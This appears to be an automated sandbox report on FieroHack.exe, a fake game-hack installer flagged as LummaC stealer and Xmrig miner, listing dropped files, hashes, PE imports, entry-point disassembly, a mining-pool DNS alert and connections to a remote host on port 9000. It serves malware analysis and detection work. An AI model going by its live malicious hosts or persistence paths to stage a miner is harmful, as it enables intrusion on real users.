 | http://playsportzone.com | Get hash | malicious | Unknown | Browse | 141.94.171.215
 | FieroHack.exe | Get hash | malicious | LummaC, Xmrig | Browse | 141.94.96.195
No context

Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Windows\Temp\qkrjwvgkutvb.sys | CrackLauncher.exe | Get hash | malicious | Blank Grabber, PureLog Stealer, Umbral Stealer, XWorm, Xmrig, zgRAT | Browse |
 | tmpjtj6c3r6.exe | Get hash | malicious | Unknown | Browse |
 | qHYHgANDmm.exe | Get hash | malicious | RedLine, Xmrig | Browse |
 | FieroHack.exe | Get hash | malicious | LummaC, Xmrig | Browse |
 | gVRqUej0ci.exe | Get hash | malicious | Xmrig | Browse |
 | 08OyZEWGbf.exe | Get hash | malicious | Xmrig | Browse |
 | SecuriteInfo.com.Trojan.InjectNET.14.31451.20106.exe | Get hash | malicious | Havoc, SilentXMRMiner, Xmrig | Browse |
 | SecuriteInfo.com.Win32.Evo-gen.18867.15916.exe | Get hash | malicious | Xmrig | Browse |
 | SecuriteInfo.com.Win32.Evo-gen.10989.17096.exe | Get hash | malicious | Xmrig | Browse |
 | Galaxy Swapper v2.0.3.exe | Get hash | malicious | LummaC, Xmrig | Browse |
C:\Users\user\AppData\Roaming\WeMod.exe | FieroHack.exe | Get hash | malicious | LummaC, Xmrig | Browse |
C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe | FieroHack.exe | Get hash | malicious | LummaC, Xmrig | Browse |
                                                  Process:C:\Windows\System32\svchost.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8192
                                                  Entropy (8bit):0.363788168458258
                                                  Encrypted:false
                                                  SSDEEP:6:6xPoaaD0JOCEfMuaaD0JOCEfMKQmDNOxPoaaD0JOCEfMuaaD0JOCEfMKQmDN:1aaD0JcaaD0JwQQbaaD0JcaaD0JwQQ
                                                  MD5:0E72F896C84F1457C62C0E20338FAC0D
                                                  SHA1:9C071CC3D15E5BD8BF603391AE447202BD9F8537
                                                  SHA-256:686DC879EA8690C42D3D5D10D0148AE7110FA4D8DCCBF957FB8E41EE3D4A42B3
                                                  SHA-512:AAA5BE088708DABC2EC9A7A6632BDF5700BE719D3F72B732BD2DFD1A3CFDD5C8884BFA4951DB0C499AF423EC30B14A49A30FBB831D1B0A880FE10053043A4251
                                                  Malicious:false
                                                  Process:C:\Windows\System32\svchost.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1310720
                                                  Entropy (8bit):1.3108347942096756
                                                  Encrypted:false
                                                  SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrQ:KooCEYhgYEL0In
                                                  MD5:6B866BE0FA86966E5A0A01B3FB5B9F0B
                                                  SHA1:37174C314D9D1D86926274EAEBFEDA6F8FC73222
                                                  SHA-256:DB0EB45AF2B98C840CBF91E486843B255D4E931193BF0FE557A657208AFC1078
                                                  SHA-512:DC7A307E77EC1C3859F497F0067BFCCD5201C56046F4D8B9021978A4114BA7CAB654A55ED82C8908B948D57020299365E5DFA854DBDDCD62B163AE851A2A576B
                                                  Malicious:false
                                                  Process:C:\Windows\System32\svchost.exe
                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x9d39cb34, page size 16384, Windows version 10.0
                                                  Category:dropped
                                                  Size (bytes):1310720
                                                  Entropy (8bit):0.4222423169995828
                                                  Encrypted:false
                                                  SSDEEP:1536:HSB2ESB2SSjlK/uedMrSU0OrsJzvqYkr3g16f2UPkLk+ku4/Iw4KKazAkUk1k2DO:Hazag03A2UrzJDO
                                                  MD5:5AABF243808C77D9FF4A0E69117E979F
                                                  SHA1:EB07B491D5A1D9D25A7EE37CC61AE6E094E44AE8
                                                  SHA-256:6384FA72CDC7716BA31FCFC159B78DA56953CC240C2AF4A79ECF6A95B6576683
                                                  SHA-512:496BF26A80590530A268506B937C95EB1355FEFD350B107475A9AA5D57C25784736B9B744F73F1AF68E24B56A9EC3AEA2E892B0D6333883020BD793F8DDF30C6
                                                  Malicious:false
                                                  Process:C:\Windows\System32\svchost.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):16384
                                                  Entropy (8bit):0.07916387731498194
                                                  Encrypted:false
                                                  SSDEEP:3:sOSlsetYeJLl8t15uqdHusX4e1nYl4e1allOE/tlnl+/rTc:sxlzJ6usX45lOpMP
                                                  MD5:8F94D448E061F9129F23343830695CA3
                                                  SHA1:3D8EBBBBA2A67C7A1BD16158D395F2318D4851E0
                                                  SHA-256:536AE9F57FE4142BDA19E2725DA75C13584434F28F5E48D887EBCCDC49463BAB
                                                  SHA-512:9DD15C86AFF0DD6A24505ACAD25576E2045DE117AB90FE6B6EDE69D589C1C13F453C218BC0CE2B5EC6F2B394F0CCA870827378D98F1EBC337CEBA90112C6BB90
                                                  Malicious:false
                                                  Process:C:\Users\user\AppData\Roaming\WeMod.exe
                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):718354208
                                                  Entropy (8bit):0.0682733719875978
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:6A2D1FD5BA3F75656E23FEEF98269C17
                                                  SHA1:FF53B16BA78B6EAC4C3EDD11E0BAD08DDDDF9AED
                                                  SHA-256:D31478DA75850F66BA9FFB48AAD05BA6EC4E93B2534EA8BA230376F5D553579C
                                                  SHA-512:08D3565A332FD56F125634697A03D11B83D16E2E54B23A14C6110373C4A559BADDDCDF304158834DF42F98E1714849C3E8990B725ED3D1A6A86CD687984C686D
                                                  Malicious:true
                                                  Joe Sandbox View:
                                                  • Filename: FieroHack.exe, Detection: malicious
                                                  Process:C:\Users\user\AppData\Roaming\Sirus.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1119
                                                  Entropy (8bit):5.345080863654519
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hj
                                                  MD5:88593431AEF401417595E7A00FE86E5F
                                                  SHA1:1714B8F6F6DCAAB3F3853EDABA7687F16DD331F4
                                                  SHA-256:ED5E60336FB00579E0867B9615CBD0C560BB667FE3CEE0674F690766579F1032
                                                  SHA-512:1D442441F96E69D8A6D5FB7E8CF01F13AF88CA2C2D0960120151B15505DD1CADC607EF9983373BA8E422C65FADAB04A615968F335A875B5C075BB9A6D0F346C9
                                                  Malicious:false
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):64
                                                  Entropy (8bit):1.1940658735648508
                                                  Encrypted:false
                                                  SSDEEP:3:NlllulVmdtZ:NllUM
                                                  MD5:013016A37665E1E37F0A3576A8EC8324
                                                  SHA1:260F55EC88E3C4D384658F3C18C7FDEF202E47DD
                                                  SHA-256:20C6A3C78E9B98F92B0F0AA8C338FF0BAC1312CBBFE5E65D4C940B828AC92FD8
                                                  SHA-512:99063E180730047A4408E3EF8ABBE1C53DEC1DF04469DFA98666308F60F8E35DEBF7E32066FE0DD1055E1181167061B3512EEE4FE72D0CD3D174E3378BA62ED8
                                                  Malicious:false
                                                  Preview:@...e................................................@..........
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Users\user\Desktop\FieroHack.exe
                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):718354208
                                                  Entropy (8bit):0.0682733719875978
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:6A2D1FD5BA3F75656E23FEEF98269C17
                                                  SHA1:FF53B16BA78B6EAC4C3EDD11E0BAD08DDDDF9AED
                                                  SHA-256:D31478DA75850F66BA9FFB48AAD05BA6EC4E93B2534EA8BA230376F5D553579C
                                                  SHA-512:08D3565A332FD56F125634697A03D11B83D16E2E54B23A14C6110373C4A559BADDDCDF304158834DF42F98E1714849C3E8990B725ED3D1A6A86CD687984C686D
                                                  Malicious:true
                                                  Joe Sandbox View:
                                                  • Filename: FieroHack.exe, Detection: malicious
                                                  Process:C:\Windows\System32\svchost.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):55
                                                  Entropy (8bit):4.306461250274409
                                                  Encrypted:false
                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                  Malicious:false
                                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):64
                                                  Entropy (8bit):1.1510207563435464
                                                  Encrypted:false
                                                  SSDEEP:3:NlllulY:NllU
                                                  MD5:34816C42747EC90B363893CCBAA692C6
                                                  SHA1:0118AF418C7FEC1DAF42BFF44FCE32F4061511E5
                                                  SHA-256:583275D04DD34E9032A29DBCEB6A641BE82CD9881A7D92BF51F5137AE3D87F85
                                                  SHA-512:7CE22AE0B922602DE3DD662B27559BF2960272DDB26957ADC1DD9E4B32FC067D6724B3ECE98D31A594439A0F64DAAAE0C0F1780C60EA7F39D4C0B49F300AD5E6
                                                  Malicious:false
                                                  Preview:@...e................................................@..........
                                                  Process:C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe
                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):14544
                                                  Entropy (8bit):6.2660301556221185
                                                  Encrypted:false
                                                  SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                  MD5:0C0195C48B6B8582FA6F6373032118DA
                                                  SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                  SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                  SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                  Malicious:false
                                                  Joe Sandbox View:
                                                  • Filename: CrackLauncher.exe, Detection: malicious
                                                  • Filename: tmpjtj6c3r6.exe, Detection: malicious
                                                  • Filename: qHYHgANDmm.exe, Detection: malicious
                                                  • Filename: FieroHack.exe, Detection: malicious
                                                  • Filename: gVRqUej0ci.exe, Detection: malicious
                                                  • Filename: 08OyZEWGbf.exe, Detection: malicious
                                                  • Filename: SecuriteInfo.com.Trojan.InjectNET.14.31451.20106.exe, Detection: malicious
                                                  • Filename: SecuriteInfo.com.Win32.Evo-gen.18867.15916.exe, Detection: malicious
                                                  • Filename: SecuriteInfo.com.Win32.Evo-gen.10989.17096.exe, Detection: malicious
                                                  • Filename: Galaxy Swapper v2.0.3.exe, Detection: malicious
                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                  Entropy (8bit):5.38824988826933
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:FieroHack.exe
                                                  File size:6'603'296 bytes
                                                  MD5:b88f61a7938ef8af011259c59efc3d3d
                                                  SHA1:ba6f4356993959799fbd88bb350558045c363a85
                                                  SHA256:640397d3d855cbb8e3400f7564294bae51d591f7adb0f7856b7acfeb47f4e3d2
                                                  SHA512:ba7a3564327f2ec4e0c34710205bdb297b8c4a29f020f973462897d52f4d99fefbb74c1f511195d2ac3bae0e44a8dc749cdf6d043ff5fba9939cdd73c59e7d40
                                                  SSDEEP:98304:0rLVoBkwXnc+AdMIm8r3ctMmKCOQhMCTgeZ1lcvd6:uhIkwt+x31/CICj1lg6
                                                  TLSH:F66623916334C011F942D2708E7E6F55C26AEC133A3AEDD946D0FE9E21F3AE69709943
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L...".$_.................f...|......H3............@
                                                  Icon Hash:170f2b3dbb3b0717
                                                  Entrypoint:0x403348
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x5F24D722 [Sat Aug 1 02:44:50 2020 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:ced282d9b261d1462772017fe2f6972b
                                                  Instruction
                                                  sub esp, 00000184h
                                                  push ebx
                                                  push esi
                                                  push edi
                                                  xor ebx, ebx
                                                  push 00008001h
                                                  mov dword ptr [esp+18h], ebx
                                                  mov dword ptr [esp+10h], 0040A198h
                                                  mov dword ptr [esp+20h], ebx
                                                  mov byte ptr [esp+14h], 00000020h
                                                  call dword ptr [004080B8h]
                                                  call dword ptr [004080BCh]
                                                  and eax, BFFFFFFFh
                                                  cmp ax, 00000006h
                                                  mov dword ptr [0042F42Ch], eax
                                                  je 00007F4760C81323h
                                                  push ebx
                                                  call 00007F4760C84486h
                                                  cmp eax, ebx
                                                  je 00007F4760C81319h
                                                  push 00000C00h
                                                  call eax
                                                  mov esi, 004082A0h
                                                  push esi
                                                  call 00007F4760C84402h
                                                  push esi
                                                  call dword ptr [004080CCh]
                                                  lea esi, dword ptr [esi+eax+01h]
                                                  cmp byte ptr [esi], bl
                                                  jne 00007F4760C812FDh
                                                  push 0000000Bh
                                                  call 00007F4760C8445Ah
                                                  push 00000009h
                                                  call 00007F4760C84453h
                                                  push 00000007h
                                                  mov dword ptr [0042F424h], eax
                                                  call 00007F4760C84447h
                                                  cmp eax, ebx
                                                  je 00007F4760C81321h
                                                  push 0000001Eh
                                                  call eax
                                                  test eax, eax
                                                  je 00007F4760C81319h
                                                  or byte ptr [0042F42Fh], 00000040h
                                                  push ebp
                                                  call dword ptr [00408038h]
                                                  push ebx
                                                  call dword ptr [00408288h]
                                                  mov dword ptr [0042F4F8h], eax
                                                  push ebx
                                                  lea eax, dword ptr [esp+38h]
                                                  push 00000160h
                                                  push eax
                                                  push ebx
                                                  push 00429850h
                                                  call dword ptr [0040816Ch]
                                                  push 0040A188h
                                                  Programming Language:
                                                  • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8544 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x38000 | 0x10fa0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x29c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6457 | 0x6600 | f6e38befa56abea7a550141c731da779 | False | 0.6682368259803921 | data | 6.434985703212657 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x1380 | 0x1400 | 569269e9338b2e8ce268ead1326e2b0b | False | 0.4625 | data | 5.2610038973135005 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x25538 | 0x600 | 17edd496e40111b5a48947c480fda13c | False | 0.4635416666666667 | data | 4.133728555004788 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x30000 | 0x8000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x38000 | 0x10fa0 | 0x11000 | 9536175401f52a89c69bba50d48e03eb | False | 0.19109030330882354 | data | 4.2366097734374675 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x38190 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 37795 x 37795 px/m | English | United States | 0.18151839583579793
RT_DIALOG | 0x489b8 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x48ab8 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x48bd8 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x48c38 | 0x14 | data | English | United States | 1.15
RT_MANIFEST | 0x48c50 | 0x34b | XML 1.0 document, ASCII text, with very long lines (843), with no line terminators | English | United States | 0.5527876631079478
DLL | Import
ADVAPI32.dll | RegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
SHELL32.dll | SHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
ole32.dll | IIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll | SetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersion, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
06/30/24-01:34:52.402369 | UDP | 2047928 | ET TROJAN CoinMiner Domain in DNS Lookup (pool .supportxmr .com) | 57509 | 53 | 192.168.2.4 | 1.1.1.1
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 30, 2024 01:34:52.411555052 CEST | 49742 | 9000 | 192.168.2.4 | 141.94.96.144
Jun 30, 2024 01:34:52.416923046 CEST | 9000 | 49742 | 141.94.96.144 | 192.168.2.4
Jun 30, 2024 01:34:52.416994095 CEST | 49742 | 9000 | 192.168.2.4 | 141.94.96.144
Jun 30, 2024 01:34:52.417277098 CEST | 49742 | 9000 | 192.168.2.4 | 141.94.96.144
Jun 30, 2024 01:34:52.422914028 CEST | 9000 | 49742 | 141.94.96.144 | 192.168.2.4
Jun 30, 2024 01:34:53.059102058 CEST | 9000 | 49742 | 141.94.96.144 | 192.168.2.4
Jun 30, 2024 01:34:53.059114933 CEST | 9000 | 49742 | 141.94.96.144 | 192.168.2.4
Jun 30, 2024 01:34:53.059186935 CEST | 49742 | 9000 | 192.168.2.4 | 141.94.96.144
Jun 30, 2024 01:34:53.061481953 CEST | 49742 | 9000 | 192.168.2.4 | 141.94.96.144
Jun 30, 2024 01:34:53.066205025 CEST | 9000 | 49742 | 141.94.96.144 | 192.168.2.4
Jun 30, 2024 01:34:53.252423048 CEST | 9000 | 49742 | 141.94.96.144 | 192.168.2.4
Jun 30, 2024 01:34:53.252681971 CEST | 49742 | 9000 | 192.168.2.4 | 141.94.96.144
Jun 30, 2024 01:34:53.257421017 CEST | 9000 | 49742 | 141.94.96.144 | 192.168.2.4
Jun 30, 2024 01:34:53.441235065 CEST | 9000 | 49742 | 141.94.96.144 | 192.168.2.4
Jun 30, 2024 01:34:53.491447926 CEST | 49742 | 9000 | 192.168.2.4 | 141.94.96.144
Jun 30, 2024 01:35:03.536570072 CEST | 9000 | 49742 | 141.94.96.144 | 192.168.2.4
Jun 30, 2024 01:35:03.585225105 CEST | 49742 | 9000 | 192.168.2.4 | 141.94.96.144
Jun 30, 2024 01:35:07.422293901 CEST | 9000 | 49742 | 141.94.96.144 | 192.168.2.4
Jun 30, 2024 01:35:07.475871086 CEST | 49742 | 9000 | 192.168.2.4 | 141.94.96.144
Jun 30, 2024 01:35:19.213376045 CEST | 9000 | 49742 | 141.94.96.144 | 192.168.2.4
Jun 30, 2024 01:35:19.257133961 CEST | 49742 | 9000 | 192.168.2.4 | 141.94.96.144
Jun 30, 2024 01:35:31.730679989 CEST | 9000 | 49742 | 141.94.96.144 | 192.168.2.4
Jun 30, 2024 01:35:31.772927046 CEST | 49742 | 9000 | 192.168.2.4 | 141.94.96.144
Jun 30, 2024 01:35:41.941694021 CEST | 9000 | 49742 | 141.94.96.144 | 192.168.2.4
Jun 30, 2024 01:35:41.991583109 CEST | 49742 | 9000 | 192.168.2.4 | 141.94.96.144
Jun 30, 2024 01:35:49.159985065 CEST | 49742 | 9000 | 192.168.2.4 | 141.94.96.144
Jun 30, 2024 01:35:49.166012049 CEST | 9000 | 49742 | 141.94.96.144 | 192.168.2.4
Jun 30, 2024 01:35:49.367660046 CEST | 9000 | 49742 | 141.94.96.144 | 192.168.2.4
Jun 30, 2024 01:35:49.413453102 CEST | 49742 | 9000 | 192.168.2.4 | 141.94.96.144
Jun 30, 2024 01:35:58.511065006 CEST | 9000 | 49742 | 141.94.96.144 | 192.168.2.4
Jun 30, 2024 01:35:58.554085016 CEST | 49742 | 9000 | 192.168.2.4 | 141.94.96.144
Jun 30, 2024 01:36:03.558718920 CEST | 9000 | 49742 | 141.94.96.144 | 192.168.2.4
Jun 30, 2024 01:36:03.600967884 CEST | 49742 | 9000 | 192.168.2.4 | 141.94.96.144
Jun 30, 2024 01:36:08.691050053 CEST | 9000 | 49742 | 141.94.96.144 | 192.168.2.4
Jun 30, 2024 01:36:08.741605997 CEST | 49742 | 9000 | 192.168.2.4 | 141.94.96.144
Jun 30, 2024 01:36:31.715552092 CEST | 9000 | 49742 | 141.94.96.144 | 192.168.2.4
Jun 30, 2024 01:36:31.757283926 CEST | 49742 | 9000 | 192.168.2.4 | 141.94.96.144
Jun 30, 2024 01:36:47.630804062 CEST | 9000 | 49742 | 141.94.96.144 | 192.168.2.4
Jun 30, 2024 01:36:47.679234028 CEST | 49742 | 9000 | 192.168.2.4 | 141.94.96.144
Jun 30, 2024 01:36:59.191154957 CEST | 9000 | 49742 | 141.94.96.144 | 192.168.2.4
Jun 30, 2024 01:36:59.241710901 CEST | 49742 | 9000 | 192.168.2.4 | 141.94.96.144
Jun 30, 2024 01:37:03.582983017 CEST | 9000 | 49742 | 141.94.96.144 | 192.168.2.4
Jun 30, 2024 01:37:03.632503033 CEST | 49742 | 9000 | 192.168.2.4 | 141.94.96.144
Jun 30, 2024 01:37:12.675256014 CEST | 9000 | 49742 | 141.94.96.144 | 192.168.2.4
Jun 30, 2024 01:37:12.726222992 CEST | 49742 | 9000 | 192.168.2.4 | 141.94.96.144
Jun 30, 2024 01:37:19.053792000 CEST | 49742 | 9000 | 192.168.2.4 | 141.94.96.144
Jun 30, 2024 01:37:19.062326908 CEST | 9000 | 49742 | 141.94.96.144 | 192.168.2.4
Jun 30, 2024 01:37:19.264878988 CEST | 9000 | 49742 | 141.94.96.144 | 192.168.2.4
Jun 30, 2024 01:37:19.319988012 CEST | 49742 | 9000 | 192.168.2.4 | 141.94.96.144
Jun 30, 2024 01:37:23.430121899 CEST | 9000 | 49742 | 141.94.96.144 | 192.168.2.4
Jun 30, 2024 01:37:23.476336002 CEST | 49742 | 9000 | 192.168.2.4 | 141.94.96.144
Jun 30, 2024 01:37:26.548785925 CEST | 49742 | 9000 | 192.168.2.4 | 141.94.96.144
Jun 30, 2024 01:37:26.553626060 CEST | 9000 | 49742 | 141.94.96.144 | 192.168.2.4
Jun 30, 2024 01:37:26.755466938 CEST | 9000 | 49742 | 141.94.96.144 | 192.168.2.4
